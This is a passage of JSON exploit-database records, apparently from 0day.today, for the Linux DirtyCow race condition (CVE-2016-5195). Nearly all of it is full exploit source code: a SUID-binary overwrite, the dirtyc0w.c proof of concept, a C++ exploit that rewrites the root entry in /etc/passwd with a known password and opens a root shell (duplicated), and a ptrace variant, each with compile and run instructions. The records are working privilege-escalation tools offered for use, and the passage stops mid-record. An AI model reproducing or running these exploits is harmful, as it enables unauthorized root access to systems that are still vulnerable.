printf(\"Don't forget to restore /tmp/bak\\n\");\r\n\r\n system(suid_binary);\r\n}\r\n\r\nint main(int argc,char *argv[]) {\r\n char *backup;\r\n\r\n printf(\"DirtyCow root privilege escalation\\n\");\r\n printf(\"Backing up %s to /tmp/bak\\n\", suid_binary);\r\n\r\n asprintf(&backup, \"cp %s /tmp/bak\", suid_binary);\r\n system(backup);\r\n\r\n f = open(suid_binary,O_RDONLY);\r\n fstat(f,&st);\r\n\r\n printf(\"Size of binary: %d\\n\", st.st_size);\r\n\r\n char payload[st.st_size];\r\n memset(payload, 0x90, st.st_size);\r\n memcpy(payload, sc, sc_len+1);\r\n\r\n map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n\r\n printf(\"Racing, this may take a while..\\n\");\r\n\r\n pthread_create(&pth1, NULL, &madviseThread, suid_binary);\r\n pthread_create(&pth2, NULL, &procselfmemThread, payload);\r\n pthread_create(&pth3, NULL, &waitForWrite, NULL);\r\n\r\n pthread_join(pth3, NULL);\r\n\r\n return 0;\r\n}\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/25943", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T19:17:02", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "DirtyCow Linux Kernel Race Condition Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25944", "id": "1337DAY-ID-25944", "sourceData": "/*\r\n####################### dirtyc0w.c #######################\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ gcc -lpthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c 
#######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n \r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3)return 1;\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. 
It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %x\\n\\n\",map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}\r\n\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25944", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-01T03:11:30", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-30T00:00:00", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/pa", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-30T00:00:00", "href": "https://0day.today/exploit/description/26446", "id": "1337DAY-ID-26446", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS 
FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n \r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n \r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n \r\nusing namespace std;\r\n \r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n \r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n \r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), 
pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n \r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n \r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n \r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = 
false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n \r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n \r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n \r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n \r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n \r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n \r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n \r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n \r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n \r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n 
FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n \r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n \r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n \r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl 
<< endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n \r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n \r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/26446", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-17T21:28:04", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW PTRACE_POKEDATA Race Condition PoC (Write Access) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26429", "id": "1337DAY-ID-26429", "sourceData": "// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball\r\n#include <fcntl.h> //// pikachu\r\n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball\r\n#include <string.h> //// pokeball\r\n#include <stdio.h> //// (___)\r\n#include <stdint.h> //// (o o)_____/\r\n#include <sys/mman.h> //// @@ ` \\ \r\n#include <sys/types.h> //// \\ ____, /miltank\r\n#include <sys/stat.h> //// // //\r\n#include <sys/wait.h> //// ^^ ^^\r\n#include <sys/ptrace.h> //// mmap bc757000\r\n#include <unistd.h> //// madvise 0\r\n////////////////////////////////////////////// ptrace 0\r\n////////////////////////////////////////////// miltank\r\n//////////////////////////////////////////////\r\nint f ;// file descriptor\r\nvoid *map ;// memory map\r\npid_t pid ;// process id\r\npthread_t pth ;// thread\r\nstruct stat st ;// file info\r\n//////////////////////////////////////////////\r\nvoid *madviseThread(void *arg) {// madvise thread\r\n int i,c=0 ;// counters\r\n for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8\r\n 
c+=madvise(map,100,MADV_DONTNEED) ;// race condition\r\n printf(\"madvise %d\\n\\n\",c) ;// sum of errors\r\n }// /madvise thread\r\n//////////////////////////////////////////////\r\nint main(int argc,char *argv[]) {// entrypoint\r\n if(argc<3)return 1 ;// ./d file contents\r\n printf(\"%s \\n\\\r\n (___) \\n\\\r\n (o o)_____/ \\n\\\r\n @@ ` \\\\ \\n\\\r\n \\\\ ____, /%s \\n\\\r\n // // \\n\\\r\n ^^ ^^ \\n\\\r\n\", argv[1], argv[2]) ;// dirty cow\r\n f=open(argv[1],O_RDONLY) ;// open read only file\r\n fstat(f,&st) ;// stat the fd\r\n map=mmap(NULL ,// mmap the file\r\n st.st_size+sizeof(long) ,// size is filesize plus padding\r\n PROT_READ ,// read-only\r\n MAP_PRIVATE ,// private mapping for cow\r\n f ,// file descriptor\r\n 0) ;// zero\r\n printf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code\r\n pid=fork() ;// fork process\r\n if(pid) {// if parent\r\n waitpid(pid,NULL,0) ;// wait for child\r\n int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)\r\n for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l\r\n for(o=0;o<l;o++)//////////////////////// repeat for each byte\r\n for(u=0;u<10000;u++)////////////////// try 10K times each time\r\n c+=ptrace(PTRACE_POKETEXT ,// inject into memory\r\n pid ,// process id\r\n map+o ,// address\r\n *((long*)(argv[2]+o))) ;// value\r\n printf(\"ptrace %d\\n\\n\",c) ;// sum of error code\r\n }// otherwise\r\n else {// child\r\n pthread_create(&pth ,// create new thread\r\n NULL ,// null\r\n madviseThread ,// run madviseThred\r\n NULL) ;// null\r\n ptrace(PTRACE_TRACEME) ;// stat ptrace on child\r\n kill(getpid(),SIGSTOP) ;// signal parent\r\n pthread_join(pth,NULL) ;// wait for thread\r\n }// / child\r\n return 0 ;// return\r\n }// / entrypoint\r\n//////////////////////////////////////////////\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26429"}, {"lastseen": 
"2018-01-11T05:08:17", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-11-29T00:00:00", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/pa", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-29T00:00:00", "href": "https://0day.today/exploit/description/26431", "id": "1337DAY-ID-26431", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n \r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n \r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n \r\nusing namespace std;\r\n \r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n \r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n \r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), 
writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n \r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n \r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n \r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n 
iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n \r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n \r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n \r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n \r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n \r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n \r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n \r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n \r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n \r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n 
\r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n \r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n \r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n \r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n 
